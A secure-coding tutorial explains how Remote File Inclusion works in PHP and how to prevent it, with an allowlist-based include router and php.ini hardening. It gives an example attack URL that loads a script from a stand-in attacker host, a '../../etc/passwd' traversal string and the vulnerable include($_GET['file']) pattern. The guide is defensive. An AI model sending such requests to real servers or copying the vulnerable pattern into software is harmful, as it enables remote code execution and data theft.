Prevention of remote file inclusion attacks
The above PHP script is vulnerable to Remote File Inclusion (RFI) because it directly uses the value from the GET parameter 'file' as the file to include. This is dangerous because an attacker could provide a URL to a malicious script hosted on their own server, which would then be included and executed by the server running this script.
For example, an attacker could request the following URL:
http://yourserver.com/vulnerable_script.php?file=http://attackerserver.com/malicious_script.php
This would cause the server to fetch malicious_script.php from attackerserver.com and execute it, potentially leading to data leakage, remote code execution, or other serious security issues.
This is a serious vulnerability: the included code runs with the privileges of the web server process, so an attacker who can execute arbitrary commands through it can move on to full system compromise. Note that the remote (URL) form of the attack only works when PHP's 'allow_url_include' setting is enabled; with it disabled, the same script remains vulnerable to Local File Inclusion (LFI), where the attacker names a file already on the server, such as a log file or an uploaded image containing PHP code. Either way, user input should never be used directly to choose the file passed to include or require.
The updated code includes several security measures to prevent Remote File Inclusion (RFI) attacks.
Firstly, it validates the input by checking if the provided file name is in the list of allowed files. If the file is not in the list, the script will terminate with an error message.
Secondly, it sanitizes the input with the basename function, which returns only the final path component and strips any directory portion. This removes directory traversal sequences such as "../../etc/passwd" before the value is used. On its own basename is not a sufficient defence (it does nothing about which file in the directory is chosen), so it should be treated as a second layer behind the allowlist check rather than a replacement for it.
Thirdly, it uses an absolute path for the file to be included. The base directory is defined in the code and the sanitized file name is appended to it, so the include can only resolve to files within that directory, limiting the set of files an attacker could ever reach. A further check with realpath, confirming that the resolved path still starts with the base directory and refers to a regular file, catches symlinks and any traversal that slipped past earlier steps.
Lastly, it's recommended to disable the 'allow_url_include' setting in the PHP configuration (it has been off by default since PHP 5.2, but verify it on every deployment). This prevents include and require from fetching files from remote locations, adding an additional layer of protection against RFI attacks. It does not stop local file inclusion, so it supplements the allowlist rather than replacing it. The related 'allow_url_fopen' setting controls URL access for functions such as file_get_contents and can be disabled separately if the application does not need it.
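The following is an added example, not the script the text above refers to, that puts the four measures together in one PHP page router. The base directory /var/www/app/pages, the page names, and the function name resolvePage are assumptions chosen for illustration; the vulnerable form is shown in a comment for comparison.

```php
<?php
declare(strict_types=1);

// Added example (not the page's original script).
//
// Vulnerable form for comparison (never do this): the request decides the
// path, so "../../etc/passwd" or, with allow_url_include=On, a full URL works.
//   include($_GET['file']);

// Assumed layout: all includable pages live under this directory (hypothetical path).
const PAGE_DIR = '/var/www/app/pages';

// Allowlist: user-facing page name => file on disk. Anything else is rejected.
// Using the array VALUE for the path means no request bytes reach the file name.
const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Map a requested page name to an absolute, verified path, or stop the request.
 */
function resolvePage(mixed $requested): string
{
    // 1. Validate against the allowlist. Non-strings (e.g. file[]=x) are rejected too.
    if (!is_string($requested) || !array_key_exists($requested, ALLOWED_PAGES)) {
        http_response_code(404);
        exit('Unknown page');
    }

    // 2. Sanitize: basename() strips any directory component. Redundant with the
    //    allowlist today, but it keeps this function safe if the allowlist is
    //    ever relaxed to a pattern match.
    $file = basename(ALLOWED_PAGES[$requested]);

    // 3. Build an absolute path under the fixed base directory.
    $candidate = PAGE_DIR . DIRECTORY_SEPARATOR . $file;

    // 4. Defence in depth: realpath() resolves symlinks and any remaining '..';
    //    the result must still sit inside PAGE_DIR and be a regular file.
    $real = realpath($candidate);
    $base = realpath(PAGE_DIR);
    if ($real === false || $base === false
        || !str_starts_with($real, $base . DIRECTORY_SEPARATOR)
        || !is_file($real)) {
        http_response_code(404);
        exit('Unknown page');
    }

    return $real;
}

// Fail closed if the runtime still permits remote includes; this should be
// fixed in php.ini, but a runtime check makes the misconfiguration visible.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    http_response_code(500);
    exit('Server misconfiguration: allow_url_include must be Off');
}

include resolvePage($_GET['file'] ?? null);
```

The matching php.ini hardening is `allow_url_include = Off` (and `allow_url_fopen = Off` where nothing else needs URL streams). With this structure a request such as `?file=http://attackerserver.com/malicious_script.php` fails at step 1, since that string is not an allowlist key, before any file system or network access happens; the realpath check in step 4 only exists to catch mistakes introduced later, for example if the allowlist is replaced by a regular expression.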